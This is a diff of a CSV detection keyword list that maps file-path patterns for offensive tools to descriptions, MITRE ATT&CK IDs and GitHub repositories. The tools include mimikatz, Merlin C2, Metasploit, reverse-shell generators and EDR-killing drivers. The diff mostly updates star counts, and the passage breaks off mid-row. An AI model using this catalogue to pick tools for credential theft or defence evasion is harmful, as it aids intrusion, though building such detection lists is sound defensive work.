+"*/merlin.html*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.js*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*/merlin.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/merlin/agent_code/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/Metasploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*/metasploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/metasploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/metasploit-framework/embedded/framework*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metatwin.git*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"*/meterpreter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/meterpreter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/meterpreter/reverse_tcp*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/MFASweep.git*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" -"*/mhydeath.git*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*/mhydeath.sln*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*/mhydeath/main.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath.git*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath.sln*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*/mhydeath/main.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/michaelweber/Macrome*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/micr0%20shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*/micr0_shell.git*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" -"*/MicroBurst.git*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*/MicroBurst.git*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*/mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimicom.idl*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimicom.idl*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.sys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/mimidrv.zip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*/mimikatz.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" -"*/mimikatz.sln*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypass/mimikatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypass/mimikatz2.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypassAV/main.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_bypassAV/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimikatz_load.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilib.def*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilove.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilove.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimilove.rc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*/mimipenguin.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams 